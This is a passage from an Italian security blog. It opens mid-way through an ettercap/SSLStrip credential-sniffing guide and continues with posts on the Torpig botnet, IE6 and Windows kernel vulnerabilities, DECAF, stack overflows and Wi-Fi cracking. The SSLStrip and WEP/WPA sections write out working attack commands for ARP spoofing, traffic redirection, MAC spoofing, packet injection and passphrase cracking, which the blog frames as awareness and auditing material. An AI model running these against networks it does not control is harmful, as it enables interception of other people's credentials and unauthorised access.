  wlan0 ->	00:00:00:00:00:00      10.10.100.5     255.255.255.0
Privileges dropped to UID 65534 GID 65534...
  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help

Fatto questo appena un utente tenterà di accedere ad un servizio su un server protetto, ettercap intercetterà username e password e la visualizzerà in questa ultima tab.

Utilizzo di SSLStrip secondo la documentazione

Secondo gli autori di SSLStrip l’utilizzo del tool dovrebbe essere il seguente:

• Flip your machine into forwarding mode. (echo “1″ > /proc/sys/net/ipv4/ip_forward)
• Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <listenPort>)
• Run sslstrip. (sslstrip.py -l <listenPort>)
• Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)

In questo modo non sono mai riuscito a beccare una password, forse qualcun altro sarà più fortunato.

Un articolo interessante si può leggere su: http://pointnext.blogspot.com/2010/01/ssl-strip-con-ettercap.html ma ancora non ho avuto il tempo di provare.

Funziona sempre?

Dalle prove che ho fatto se la vittima lavora su una macchina Windows (ho provato soltanto con XP e Vista) l’attacco va a buon fine con qualsiasi browser. Safari su MacOsX restituisce pagina bianca, cioè non fa nessuna operazione e l’attacco non va a buon fine, ma l’utente non riceve nessuna segnalazione sul fatto che la connessione sicura è stata compromessa. Su Ubuntu utilizzando firefox o chrome si viene avvertiti che il certificato di sicurezza non è valido e l’utente può decidere di abbandonare la connessione (comunque se l’utente accetta il certificato viene restituita una pagina bianca), invece con Opera l’attacco va a buon fine.

Soluzioni

Per ora le soluzioni che mi sento di suggerire sono:

• Se è possibile, preferire il cavo alla wireless, infatti è più difficile connettersi ad una LAN con il cavo che non tramite wireless anche se è protetta;
• Aggiornare browser e Sistema Operativo sperando che venga risolto il problema (caso molto probabile in quanto questo problema è noto dal 2009);
• Consiglio di parte: utilizzare un sistema operativo più sicuro degli altri ad es: Ubuntu o MacOsX

Saluti Arturu.it

PS Come tutti hanno capito non si trattava di un articolo che parla dello “Strip” Tease. Tu lettore, se ancora cerchi questo, leggendo ancora non troverai niente, anche perché: l’articolo è finito…

Recentemente mi sto interessando di botnet, qualche giorno fa ho visto un interessante video-lezione-conferenza sul furto di botnet. Una botnet è una rete di computer collegati ad internet che fanno parte di un insieme di computer controllato da un’unica entità, il botmaster. Ciò può essere causato da falle nella sicurezza o mancanza di attenzione da parte dell’utente e dell’amministratore di sistema, per cui i computer vengono infettati da virus informatici o trojan i quali consentono ai loro creatori di controllare il sistema da remoto. I controllori della botnet possono in questo modo sfruttare i sistemi compromessi per scagliare attacchi distribuiti del tipo denial-of-service (DDoS) contro qualsiasi altro sistema in rete oppure compiere altre operazioni illecite, in taluni casi agendo persino su commissione di organizzazioni criminali. I computer che compongono la botnet sono chiamati bot (da roBOT) o zombie. Un gruppo di ricercatori presso UCSB di recente è riuscito a prendere il controllo su una parte di Torpig botnet per 10 giorni. Durante questo periodo, hanno osservato 180 mila infezioni e registrate quasi 70GB di dati raccolti che i bot. Questi dati includono le informazioni presentate da tutti i siti che la persona infetta aveva visitato, smtp, ftp, pop3, Windows, password, numeri di carta di credito e le password da parte dei manager password.

Qui ci sono i fatti più interessanti della conferenza:

Torpig utilizza una tecnica chiamata “flussante dominio” per evitare di essere arrestato, semplicemente bloccando l’IP o il nome del dominio del server del centro di controllo. L’idea è semplice – in funzione della data e ora l’algoritmo genera un nome di dominio a cui connettersi. Se il dominio viene chiuso, il bot userà semplicemente un dominio diverso, dopo qualche tempo. I ricercatori conoscendo la generazione dei nomi di domino sono stati in grado di assumere il controllo su una parte della botnet crackando l’algoritmo di generazione nome di dominio e la registrazione di alcuni dei nome di dominio da utilizzare per la comunicazione.

Successivamente, i cattivi notato che una parte della botnet è stata sottratta, rilasciano un aggiornamento software per tutti i bot che utilizzeranno un nuovo algoritmo di flusso di dominio, questi nuovi algoritmi usano gli argomenti popolari del giorno sul social network Twitter e li utilizzano per generare i nomi di dominio.Con questo nuovo algoritmo i ricercatori non erano più in grado di prevedere il dominio che sarebbe stato utilizzato il giorno successivo, bisognerebbe conoscere un giorno prima l’argomento più polare su un social network che riporta per l’80% notizie in tempo reale.

Quando i bot comunicano con il server di comando trasmettono un campo ID univoco che è stato generato dall’hardware della macchina. Questo ha permesso ai ricercatori di stimare il numero reale di computer infetti. I ricercatori hanno visto 1,2 milioni di indirizzi IP unici, ma soltanto 180.000 macchine. I bot analizzati rubavano i dati finanziari da 410 istituti finanziari (top 5: PayPal, Poste Italiane, Capital One, E * Trade, Chase), avrebbero un registro di carte di credito (prime 5 carte: Visa, Mastercard, American Express, Maestro, Discover ), e avrebbero anche rubato tutte le password dal gestore delle password dei browser.

In uno studio del 2008 Symantec ha stimato che le informazioni riguardanti le carte di credito sono vendute da 10 a 25 dollari per ogni carta nel mercato nero. Le informazioni dei conti bancari sono vendute da 10.00 a 1,000 dollari per ogni conto. L’utilizzo di questo studio ha permesso ai ricercatori di stimare, durante il periodo di 10 giorni, l’importo delle risorse finanziarie che i bots hanno raccolto sono state del valore di 83.000 a 8,3 milioni di dollari. Utilizzando varie stime dei ricercatori si è calcolato che i bot sono usati per il denial of service e la larghezza di banda totale sarebbe 17Gbps.

Dal momento che è stato Torpig a inviare tutti i dati HTTP POST e-mail al server di comando e controllo, i ricercatori hanno statistiche sulle e-mail e hanno scoperto che il 14% di tutte le email sono state lette sui posti di lavoro, il 10% ha parlava di sicurezza del computer / malware, 7% di denaro, 6% erano appassionati di sport, il 5% erano preoccupati per gli esami e la loro qualità, il 4% parlavano della ricerca di partner online. Il 28% delle persone riutilizzato la propria password su più domini. Ci sono state 173.686 password univoche.

I ricercatori hanno convertito le password in formato Unix e hanno cercato di forzarle con John the Ripper. 56.000 erano crackate in meno di 65 minuti con attacco di forza bruta, invece utilizzando un dizionario 14.000 password son bastati 10 minuti. E altri 30.000 sono state le password crackate nelle 24 ore successive. Il 58% di tutte le password sono state crackate in 24 ore.

Il video conferenza è lungo 1h 15m ed è presentato da Richard A. Kemmerer.

Rubare una botnet

Qui ci sono tutti gli argomenti della conferenza:

• [02:00] terminologia botnet – bot, botnet, server di comando e controllo, canale di controllo, botmaster.
• [03:00] Introduzione al trojan Torpig e la piattaforma Mebroot malware.
• [05:00] Come Torpig opere.
• [11:30] Torpig iniezione HTML.
• [15:00] fluxing dominio.
• [19:15] Capofila c Torpig’s & C server.
• [24:10] principi di raccolta dei dati.
• [26:00] C & C protocollo del server.
• [31:10] stima botnet di dimensioni.
• [37:00] minacce “botnet” è: il furto di informazioni finanziarie, denial of service, server proxy, furti privacy.
• [37:30] Minaccia: furto di informazioni finanziarie.
• [42:00] Threat: Denial of Service.
• [43:30] minacce: i server proxy.
• [44:20] Minaccia: furto Privacy.
• [47:00] Analisi Password.
• [50:40] punizione penale.
• [53:00] applicazione della legge.
• [58:00] Rimpatrio dei dati.
• [01:00:00] Etica.
• [01:02:00] Conclusioni.
• [01:06:00] Domande e risposte.

In Francia e Germania le autorità diffondono una nota: non usate Internet Explorer. Alla base della vicenda c’è una vulnerabilità relativa a Internet Explorer versione 6 su sistema operativo Windows XP. Lo stesso problema di sicurezza starebbe alla base del contenzioso tra Google governo cinese.

Il governo tedesco agli utenti: «Non usate Explorer»”,” Explorer, anche la Francia lancia l’allarme”. Sono questi i titoli di alcuni dei principali quotidiani online dedicati a una vicenda che merita un minimo approfondimento. Riportiamo il calendario a qualche giorno fa e per rinfrescare la memoria segnaliamo questo link dedicato alla vicenda in cui Google e Governo cinese si trovano a confrontarsi. Google ha  rilevato alcune violazioni dei propri sistemi informatici notando accessi indesiderati ad alcuni account di posta elettronica: tali caselle email sarebbero per di più riconducibili ad alcuni attivisti cinesi per i diritti umani.

Da Mountain View vengono chieste spiegazioni alle autorità cinesi con la minaccia da parte di Google di sospendere ogni attività in Cina: Google parrebbe disposta a rinunciare alle enormi opportunità di business legate ai forti tassi di crescita del mercato IT in Cina e all’elevato numero di utenti potenzialmente raggiungibile. Per il momento il governo cinese non ha dato importanti riscontri, e pure le autorità americane si sono fatte avanti per far chiarezza sull’accaduto: oltre a Google ci sarebbero altre 30 aziende fatte oggetto di attacchi informatici provenienti dalla Cina. La vicenda è ancora tutta da chiarire nei suoi dettagli e, forse, ai giornali giungerà solo una parte di tali informazioni.

Questi appena descritti sono in estrema sintesi i fatti di cronaca a cui però si deve aggiungere un dettaglio essenziale e importante per poter comprendere i titoli dei quotidiani citati in apertura. Stando a quanto identificato da molti esperti di sicurezza informatica, tra i quali i tecnici di McAfee, alla base degli attacchi subiti da Google e dai già citati account Gmail vi sarebbe una vulnerabilità di alcune versioni datate di Internet Explorer.

Sarebbe proprio la vulnerabilità di Internet Explorer ad aver scatenato un putiferio in Europa tanto da indurre il Bundesamt fuer Sicherheit in der Informationstechnik – l’Ufficio Federale responsabile per la sicurezza informatica – a diffondere un comunicato nel quale invita a non usare Internet Explorer senza se e senza ma. Anche disattivando ActiveX e impostando il più alto livello di sicurezza Internet Explorer nelle versioni 6, 7 e 8 viene definito insicuro da BSI e gli utenti sono invitati a utilizzare browser alternativi.

Alla presa di posizione delle autorità tedesche fa eco un’analoga dichiarazione del CERTA (Centre d’Expertise Gouvernemental de Réponse et de Traitement des Attaques informatique) francese. Il messaggio è in sostanza il medesimo: utilizzate un browser alternativo.

A tutte queste dichiarazioni si contrappongono altre prese di posizione non così convinte della pericolosità di Internet Explorer, o meglio non convinte che altre alternative possano offrire condizioni di utilizzo veramente sicure all’utente finale. Sophos prende chiaramente posizione a fianco di Microsoft e nel blog di Graham Cluley – senior technology consultant – si legge:

Ora, in un contraddittorio è lecito dare la parola all’accusa – e lo abbiamo fatto indicando gli annunci fatti dalle autorità francesi e tedesche – ma anche alla difesa, e lo facciamo segnalandovi questo breve video diffuso poche ore fa da Microsoft Italia.

Internet Explorer -

Il video per ovvie ragioni non scende troppo nel dettaglio ma da parte Microsoft vengono citate ulteriori fonti di approfondimento. Cerchiamo ora di capire meglio il problema relativo a Internet Explorer e alla vicenda nel suo complesso per poi valutare in maniera autonoma l’accaduto.

Dalle caratteristiche pubblicate per sfruttare la vulnerabilità di Internet Explorer 6 – Microsoft indica solo questa versione affetta dalla vulnerabilità in oggetto- gli utenti che hanno subito un attacco sono stati indotti a visitare una particolare pagina web appositamente creata. Nel caso specifico potrebbe essere stata usata una email, insomma Microsoft sottolinea la natura mirata degli attacchi ai singoli utenti e non all’infrastruttura di Google.

A ciò nella ricostruzione di Redmond viene fatto notare un dato di fatto non trascurabile: la vulnerabilità è sfruttabile su sistema operativo Microsoft Windows XP e con Internet Explorer versione 6. Microsoft sottolinea come entrambi i prodotti siano vetusti – vengono definiti paleolitici dal blog di Feliciano Intini – sottolineando come oggi sia disponibile Windows 7 e Internet Explorer 8. Per la versione del browser ci sentiamo di condividere la posizione di Microsoft mentre per quanto riguarda il sistema operativo è inutile sottolineare quanto Windows XP sia tutt’oggi diffuso, soprattutto in molte aziende. Per Microsoft pare non esserci alcun allarme straordinario, anzi i vari esponenti approfittano della situazione per sensibilizzare su un aspetto fondamentale per la sicurezza: l’aggiornamento del software e del sistema operativo.

Un dettaglio però non ci tornava e abbiamo voluto chiedere diretto riscontro a Feliciano Intini -chief security advisor di Microsoft Italia -. Nelle note delle autorità tedesche e francesi vengono indicati come potenzialmente vulnerabili anche Internet Explorer 7 e 8, mentre dalle informazioni diffuse da Microsoft il problema parrebbe limitato alla sola versione 6 in abbinamento a Windows XP. Inutile sottolineare che su molti altri articoli pubblicati non venga nemmeno indicata la versione di Internet Explorer. Questa omissione farebbe quindi supporre che tutti gli utenti abituati all’uso di tale software siano in pericolo.

Siamo quindi andati alla fonte rivolgendo il quesito all’esperto di Microsoft. La situazione più pericolosa si concretizza su PC dotati di sistemi operativi Microsoft Windows XP in abbinamento Internet Explorer versione 6. La stessa vulnerabilità è presente in Internet Explorer 7 e 8 ma con sistema operativo più recente preoccupa di meno se l’utente abilità la modalità IE Protected Mode e DEP. Al momento è nota l’esistenza di attacchi a sistemi dotati di Internet Explorer 6 e Windows XP e pare più complicato sfruttare le medesime vulnerabilità su sistemi più aggiornati. Detto ciò, e Microsoft stessa lo ammette, il problema va risolto e anche in fretta.

Nell’apertura di questo articolo abbiamo descritto una situazione molto seria e problematica, soprattutto in relazione alla diffusione di Internet Explorer e al potenziale bacino di utenti a rischio. Nell’analisi dei fatti il tutto risulta più limitato e circostanziato. Sia chiaro: la vulnerabilità in Internet Explorer 6 rimane e al momento è meno preoccupante nelle versioni 7 e 8, andrà risolta magari senza aspettare il prossimo patch day.

Stando alle attuali informazioni disponibili e in attesa di eventuali sviluppi,  la sitazione diviene pericolosa in un contesto nel quale l’utente o chi per esso non sia in grado di gestire correttamente il proprio sistema omettendo poche e semplici abitudini che ormai da anni descriviamo: software e sistema operativo aggiornato con le ultime patch in abbinamento a suite per la sicurezza completa (il solo antivirus potrebbe non bastare!), magari non sviluppata da Microsoft ma da terze parti in virtù di una maggiore possibilità di scelta.

In apertura abbiamo citato enti francesi e tedeschi e pare doveroso segnalare il punto di vista del CERT-SPC -unità di prevenzione e gestione degli incidenti informatici del Sistema Pubblico di Connettività – italiano che in una nota diffusa qui riporta:

In relazione alla vulnerabilità di tipo “zero-day” che interessa Internet Explorer già  osservata dal CERT-SPC dallo scorso 15 Gennaio ed illustrata nella sezione bollettini, si rappresenta che in ambito SPC al momento non sono stati segnalati incidenti riconducibili alla stessa. Si evidenzia però il rischio associato alla possibilità di sfruttare tale vulnerabilità in associazione ad iniziative di spam, ai risultati proposti  dai motori di ricerca ed ai collegamenti presenti sui social network, inerenti eventi di particolare ed attuale interesse collettivo, quali il recente sisma  che ha devastato HAITI o all’attenzione mediatica sull’uscita del film AVATAR. Tali circostanze possono essere utilizzate dagli attaccanti per indurre gli utenti a visitare pagine web appositamente realizzate per inoculare malware o la sfruttare anche questa vulnerabilità in Explorer.
…Microsoft, infine, in una nota preventivamente anticipata al CERT-SPC ha indicato anche l’ipotesi di un aggiornamento di sicurezza di tipo “OUT OF BAND” ovvero straordinario rispetto al normale ciclo di rilascio del software correttivo appena avvenuto per il mese di Gennaio.

Fonte

In tutte le versioni ancora supportate di Windows esiste una vulnerabilità che, secondo il suo scopritore, se ne sta lì nascosta da almeno 17 anni. Nel frattempo BigM si industria per sanare IE.

Mentre Microsoft è ancora impegnata nello sviluppo di una patch per Internet Explorer che risolva la falla recentemente utilizzata negli attacchi a Google, un esperto di sicurezza ha divulgato i dettagli di una vulnerabilità apparentemente celata in Windows dalla “notte dei tempi”, ovvero dall’anno 1993. Ad esserne interessate sarebbero tutte le versioni a 32 bit di Windows a partire da NT, inclusi XP, Server 2003, Vista, Server 2009 e 7.

Tavis Ormandy, scopritore della falla e information security engineer presso Google, spiega in questo advisory che il problema è legato alla Virtual DOS Machine, e può essere sfruttato per iniettare del codice direttamente nel kernel di Windows: questo potrebbe consentire a un aggressore o a un malware di prendere il controllo delle aree più “sensibili” e protette del sistema, e installare ad esempio key logger o rootkit.

The Register riporta che la società Immunity di Miami ha già aggiunto l’exploit della vulnerabilità al proprio software di auditing indirizzato ai professionisti della sicurezza. La società afferma che l’exploit è stato testato con successo su tutte le versioni di Windows ad eccezione della 3.1.

In attesa che Microsoft rilasci una patch, Ormandy afferma che è possibile proteggersi della debolezza disattivando i sottosistemi MSDOS e WOWEXEC di Windows: per farlo è necessario modificare alcune voci di registro così come spiegato in questo articolo del supporto tecnico di Microsoft. Va rimarcato che disattivando questi due componenti si perde la compatibilità con i vecchi programmi a 16 bit (quelli per DOS e Windows 3.1), ma per la stragrande maggioranza degli utenti questo non dovrebbe essere un problema.

Ormandy sostiene di aver segnalato il bug a Microsoft nel giugno del 2009, tenendone nel frattempo segreti i dettagli: non avendo ricevuto da BigM alcuna risposta, e avendo constatato che il baco è ancora aperto, negli scorsi giorni si è deciso a rendere il problema di pubblico dominio insieme a un exploit dimostrativo.

Contattata da The Register, Microsoft ha fatto sapere, per bocca di un suo portavoce, di stare vagliando l’advisory di Ormandy e di non essere a conoscenza di attacchi che sfruttino questa vulnerabilità.

Ieri il big di Redmond ha anche annunciato che la recente falla di Internet Explorer verrà corretta appena possibile, e al di fuori del suo ordinario ciclo di pubblicazione dei bollettini di sicurezza. Sui rischi e la portata di tale vulnerabilità Microsoft Italia ha recentemente minimizzato.

“Pur non essendo mutato in modo significativo lo scenario di rischio (nel senso che gli attacchi noti sono rimasti quelli mirati e circoscritti, ed efficaci solo su sistemi con IE6), il clamore mediatico e la confusione da parte dei clienti che ne è derivata (vedi dubbi tra versioni impattate dalla vulnerabilità – praticamente tutte – e quella seriamente impattate da eventuali attacchi intrusivi – solo IE6), anche relativamente alle contromisure temporanee di difesa (vedi abilitazione del DEP), hanno spinto verso la decisione di un rilascio in modalità Out-of-band (OOB)” ha scritto ieri Feliciano Intini, chief security advisor di Microsoft Italia, sul suo blog.

Fonte

Due hacker pubblicano un software ideato per contrastare le misure di indagine forense rese possibili dai tool automatizzati di Microsoft. COFEE è un software progettato dalla Microsoft che serve per indagini forensi, in parole povere tutte le polizie del mondo e le forze dell’ordine hanno in dotazione questo software che usano per le loro indagini, fin qua non c’è problema. Ma, non si capisce come, è finito sulle reti p2p; dopo questo evento spunta DECAF.

Microsoft ci aveva provato a chiudere il vaso di Pandora aperto con la distribuzione non autorizzata di COFEE sui network di P2P, temendo possibili contromosse da parte di hacker o cybercriminali. Ma la minaccia legale non è bastata a fermare il libero fluire in Rete del tool forense e alla fine quella contromossa si è concretizzata nella forma di DECAF: ovvero Detect and Eliminate Computer Assisted Forensics.

Nella stessa misura in cui COFEE serve agli investigatori per raccogliere prove e tracce su sistemi informatici connessi a indagini e crimini, così DECAF appronta una serie di contromisure tese a bloccare tutti i tentativi di intromissione, analisi e log possibili col tool gratuito di Redmond.

“Vogliamo promuovere un sano e illimitato flusso del traffico Internet e dimostrare perché le forze dell’ordine non dovrebbero affidarsi soltanto a Microsoft per automatizzare la ricerca intelligente di prove” ha detto uno degli autori di DECAF spiegando le motivazioni alla base del software da lui contribuito a creare.

Da Redmond avevano provato a far sparire le tracce di COFEE minacciando ritorsioni legali per quei siti che lo avessero continuato a offrire come download, e come dimostra l’esistenza di DECAF la possibilità di veder nascere una contromisura in quegli ambienti dove per Microsoft si annida l’illegalità, il software non certificato e ogni genere di pericoli per l’utente, era ben più che concreta.

Una volta installato in pianta stabile sul sistema, DECAF agisce monitorando il PC e verificando l’avvio dei processi, il collegamento di chiavette USB e l’esistenza di tracce riconducibili ai file di COFEE. Nel qual caso l’esito del monitoraggio dinamico fosse positivo, DECAF provvede automaticamente a cancellare i log creati dall’utility forense, camuffare gli indirizzi fisici MAC, “smontare” e disabilitare i drive USB e altro ancora. I suoi due autori promettono inoltre future versioni capaci di bloccare il sistema protetto agendo da remoto.

Appare ovviamente scontato il fatto che, anche qualora Microsoft provasse a buttare il giù il sito di DECAF, il tool continuerebbe a essere disponibile in rete, sul P2P e altrove, magari su Wikileaks dove già hanno provveduto a ospitare COFEE. Si attende ora la risposta che Redmond deciderà di fornire all’esistenza del “decaffeinato” del loro forensics tool.

Fonte

Oggi ho deciso di parlare di Stack Overflow. In molti stanno pensando “nooo ancora, e basta, non ci capisco niente di quelle cose che scrive”. Vediamo stavolta di fare un po teoria, molto spicciola. Poi cercherò di rispondere ad alcune domande che qualcuno mi ha posto:
- che cos’è l’Overflow?
- come lo trovo?
- ma dopo che trovo sto Overflow che ci faccio?
- come funziona e funziona sempre?
- bisogna utilizzare particolari programmi?
- mi possono arrestare?

Incominciamo con una situazione molto cumune nella vita di tutti. Immaginiamo di essere in una tavola piena di persone, tra i commensali si alza Bob e inizia a versare il vino, dato che i commensali sono molti capita che non tutti i bicchieri sono della stessa dimensione, Bob deve fare attenzione a non far traboccare i bicchieri. A un certo punto i commensali decidono di bendare gli occhi a Bob e fargli versare il vino su indicazione di Alice. Dato che Alice tende ad essere biricchina tenta in tutti i modi di far traboccare i bicchieri e Bob deve fare molta attenzione a non sbagliare pena la derisione. Ora, dopo questa favoletta, trasponiamo tutto nel mondo informatico. Dobbiamo immaginare un programma informatico come una serie di operazioni scritte su una striscia infinita di carta (tipo il rotolo della foxy), su questa striscia ci sono scritte le operazioni che il computer esegue in base ai comandi dell’utente; inoltre, sulla stessa striscia verranno lasciati diversi spazi per memorizzare i dati (i nostri bicchieri). Mmm… Ora che mi ricordo… Alice è il nostro utente.
Alice da i comandi al computer (Bob) e il computer si comporta secondo le le istruzioni scritte sul rotolo foxy, si sposta sul rotolo, memorizza, poi si riposta, poi rimemorizza, Alice da i comandi e Bob si sposta, continuando finché Alice non decide di chiudere il programma oppure finché non va in crash per colpa di Alice o di altro…

I dati sono inseriti in appositi contenitori (i bicchieri per intenderci), può succedere a volte che il bicchiere è troppo piccolo e i dati traboccano sulle zone successive andando a sovrascrivere altre zone di memorie. Questo che si verifica è un errore di programmazione comunemente e superficialmente chiamato bug, in questo caso specifico viene chiamato Stack Overflow.

Un bug del genere non è molto raro ma neanche troppo facile da trovare, dato che i software prima di essere rilasciati vengono testati a sufficienza la maggior parte di questi bug vengono eliminati, giusto per farci un’idea un probabile Overflow si manifesta quando riceviamo un errore del genere: “L’istruzione a 0×41414141 ha fatto riferimento alla memoria a 0×41414141. La memoria non poteva essere read”.

Con uno Stack Overflow non ci si può fare molto oltre che aspettare che i programmatori risolvano il problema, ma volendo ci si può costruire un Exploit che sfrutti il bug. Se ad essere vulnerabile è un programma che lavora in remoto allora si ha la possibilità di attaccare da remoto un sistema. In genere si apre un “canale” con il quale l’attaccante può eseguire delle operazioni sul computer della vittima.

Il concetto di base sta nel riempire la zona dei dati con un “programma” che apra un “canale” sul computer della vittima e sovrascrivere le porzioni di rotolo dove ci sono le istruzioni (i comandi di Bob) per far eseguire il nostro programma. Nel gergo il “programma” (che programma non è, anche se è una serie di istruzioni) shellcode, e di shellcode ci stanno a tonnellate, googlare per credere. L’aspetto arduo è riuscire a trovare la giusta quantità di dati per riuscire a sovrascrivere i dati e le istruzioni senza sovrascrivere i dati successivi, altrimenti il programma va in crash e finisce la festa. La maggior parte delle volte l’individuazione della quantità esatta di dati da sovrascrivere è fatta a tentativi (logicamente su un sistema con le stesse condizioni). Comunque su internet, grazie a google, si trovano degli exploit già pronti per essere compilati.

Di solito si usano dei debugger ed editor esadecimali, ma se c’è già pronto un exploit scaricato da internet è sufficiente un compilatore. C’è da dire che per facilitare questi compiti si può usare un framework che ultimamente ha riscosso un grande successo: Metasploit.

Dal punto di vista legare operare sul proprio computer non è illegale, ma farlo su quello di un’altra persona e totalmente illegale.

Spero che per il 80% dei visitatori non sia stato troppo complicato e per il restante 20% troppo generico, dipende dal punto di vista.

Saluti Arturu.it

Gli ultimi anni sono stati segnati da una diffusione significativa delle connessioni wi-fi sia in ambito domestico che lavorativo. In entrambi gli ambiti, tuttavia, troppo spesso si sottovalutano i rischi connessi alla sicurezza delle reti wireless; il più degli utenti, infatti, ignora che il cracking di queste reti può essere davvero molto semplice e, fatto ancor più grave, può essere messo in pratica con successo anche da utenti poco esperti.

Questo breve articolo si propone di illustrare, anche attraverso esempi pratici, le tecniche di cracking più comuni al fine di consentire al lettore di adottare le opportune contromisure necessarie a mettere in sicurezza la propria rete senza fili.

Reti WEP e WPA

Attualmente la quasi totalità delle reti wi-fi è protetta mediante gli standard WEP e WPA-PSK.
Il WEP (Wired Equivalent Privacy) è uno standard basato sull’algoritmo di cifratura dei dati RC4, il quale ha il vantaggio di essere molto veloce ma poco sicuro: nella particolare implementazione utilizzata, infatti, sono stati riscontrati difetti gravissimi che permettono il calcolo della chiave di rete a partire da dati ottenuti dall’analisi del traffico criptato.
Il WPA-PSK (Wi-Fi Protected Access / Pre Shared Keys) è un protocollo creato per tamponare il problema scaturito dal fallimento del WEP. Utilizza chiavi di criptazione dinamiche a 128 bit e combina la chiave in uso con un vettore di inizializzazione (IVS). Le chiavi variano dinamicamente e la stessa non compare mai due volte consecutive.
WPA2-AES è l’evoluzione dei protocolli precedenti, più robusto dei due sistemi appena trattati.

La suite Aircrack-ng

Per gli esempi pratici di questo articolo useremo la nota suite per l’auditing di reti wireless Aircrack-ng su sistema operativo Linux (è possibile, anche se più problematico, utilizzare la suite anche su sistemi Windows).
Aircrack-ng offre all’utilizzatore un packet sniffer e una serie di tool di analisi che possono essere impiegati con qualsiasi scheda wireless munita di supporto per il monitor mode.

Dopo aver effettuato il download dal sito ufficiale dovremo procedere all’installazione; per farlo si consiglia di seguire le istruzioni presenti sul sito dell’autore; se avete Ubuntu ve la caverete con l’istruzione:

$ sudo apt-get install aircrack-ng

Il Monitor Mode

Le schede di rete funzionano normalmente in una modalità che legge in prima istanza il MAC Address del pacchetto catturato e lo scarta automaticamente se non è indirizzato nostro host. Per i nostri fini è invece necessario poter catturare tutto il traffico “circolante”.
La modalità Monitor permette la ricezione del pacchetto anche nel caso in cui il nostro host non sia associato con l’access point o il terminale che lo ha generato.
Per impostare la scheda di rete nella modalità Monitor, si utilizzano comunemente le seguenti istruzioni:

$ su
# airmon-ng stop <interfaccia>
# airmon-ng start <interfaccia>

Per verificare se il Monitor Mode sia stato attivato correttamente sarà sufficiente lanciare il comando:

# iwconfig

e leggere il valore del campo Mode dall’output del comando.

Sniffing dei pacchetti

Si definisce “sniffing” l’attività di intercettazione passiva dei dati che transitano in una rete telematica. Lo sniffing, in pratica, non è altro che la cattura dei pacchetti in transito su una rete.
Per visualizzare l’elenco delle reti sotto monitoraggio è sufficiente lanciare il comando

# airodump-ng <interfaccia>

Lanciato senza altri parametri il comando citato non salva i pacchetti ricevuti da nessuna parte ma si limita a fare polling tra tutti i canali alla ricerca del massimo numero di reti possibile (il polling consiste nel provare a connettersi su tutti i canali ad intervalli regolari di tempo).

Questa fase, generalmente, percede lo sniffing vero e proprio; in questa fase preliminare, in sostanza, si “sceglie la vittima” dell’attacco. Per farlo sarà innanzituitto necessario appuntarsi alcune informazioni sulla rete individuata:

• BSSID
• ESSID
• Channel (canale)
• SSID del/dei client/s

Fatto questo sarà possibile lanciare il comando che avvia lo sniffing vero e proprio e salva su file il traffico catturato:

# airodump-ng -c <canale> -b <BSSID> -w <filedicattura.ivs> <interfaccia>

A questo punto, a seconda del tipo di protezione che difende la rete-obiettivo si può agire con tecniche differenti.
In certi casi, a dire il vero non frequentissimi, gli access point si proteggono da attacchi esterni tramite il MAC filtering, che consiste nell’accettare connessioni soltanto dagli host il cui indirizzo sia presente in una lista dedicata (whitelist).
Sfruttando il fatto che almeno il MAC address dell’utente proprietario della rete sia presente in whitelist si può tentare di attaccare questo sistema facendo MAC Spoofing, ovvero cambiando con una riga di comando il proprio MAC Address con quello del proprietario della rete, che può essere ricavato ad esempio dalla lista delle connessioni tracciate da airodump.
I seguenti comandi cambiano il proprio indirizzo MAC con quello inserito come argomento:

# ifconfig <interfaccia> down
# ifconfig <interfaccia> hw ether <nuovo_mac>
# ifconfig <interfaccia> up

Cracking WEP

Come già accennato il WEP ha un difetto di implementazione che lo rende vulnerabile ad un attacco basato su un semplice calcolo statistico: qualora si sia intercettata una quantità sufficiente di traffico l’attacco ha percentuali di riuscita vicine al 99%.

Se il nostro obiettivo è bucare (o meglio testare) una rete protetta con WEP, il primo passo da compiere è, quindi, quello di catturare un adeguato numero di pacchetti nel più breve tempo possibile. Per farlo una comune attività di sniffing potrebbe essere sufficiente.
Qualora si desideri velocizzare l’operazione è possibile utilizzare in combinazione tecniche di fake association e packet injection: con la prima tecnica si crea un’associazione fittizia con l’access point vittima mentre con la seconda si fa in modo che nella rete circolino un gran numero di pacchetti.
In questo modo sarà sufficiente pochissimo tempo per raccogliere il nostro bottino.

Il comando che mette in pratica quanto appena descritto è aireplay-ng, lanciato coi parametri indicati:

1) Per la “Fake Association”

# aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <mio_mac> <interfaccia>

2) Per il “Packet Injection”

# aireplay-ng -3 -b <BSSID> -h <mio_mac> <interfaccia>

Al termine delle operazioni lanciamo il comando:

# aircrack-ng <filedicattura.ivs>

…ed attendiamo il responso.

Cracking WPA-PSK

Le reti WPA-PSK fortunatamente non soffrono della grave vulnerabilità del protocollo WEP. Craccare una rete di questo tipo necessità, pertanto, di un approccio per tentativi in cerca della giusta passphrase.

L’obiettivo preliminare è catturare un handshake valido. Per chi non lo sapesse l’handshake è una sequenza di pacchetti scambiati tra un client autorizzato e un Access Point che porta all’autenticazione.

Per conseguire questo primo fine si possono seguire due strade, la prima è aspettare che un client si connetta spontaneamente, la seconda è usare il Deauthentication attack.
Il principio è far disconnettere un client con lo scopo di fargli ripetere la procedura di autenticazione, che sarà attentamente catturata dal nostro sniffer.
La prima opzione, che pare a prima vista “poco furba”, diventa l’unica praticabile quando nessun client è connesso alla rete obiettivo.

Una volta catturato l’handshake si passa alla ricerca della passphrase.
Per questioni di tempo è impensabile effettuare un attacco a tentativi col grezzo “brute force” (prova sequenziale di tutte le combinazioni di un insieme di caratteri detto “charset”). E’ da preferire un attacco a dizionario, che però richiede una wordlist (lista di parole di senso compiuto normalmente utilizzate come password; ad esempio nomi di persona) di buona qualità per risultare efficiente.
Una volta ottenuta la wordlist sarà sufficiente eseguire il comando:

aircrack-ng -w <wordlist.txt> -b <mac_address> <filedicattura.ivs>

ed attendere speranzosi che la password cercata sia nel dizionario.
Un tipo di attacco di questo tipo andrà difficilmente a buon fine se la password è stata scelta con le dovute cautele.

Evoluzione del cracking e difesa della rete

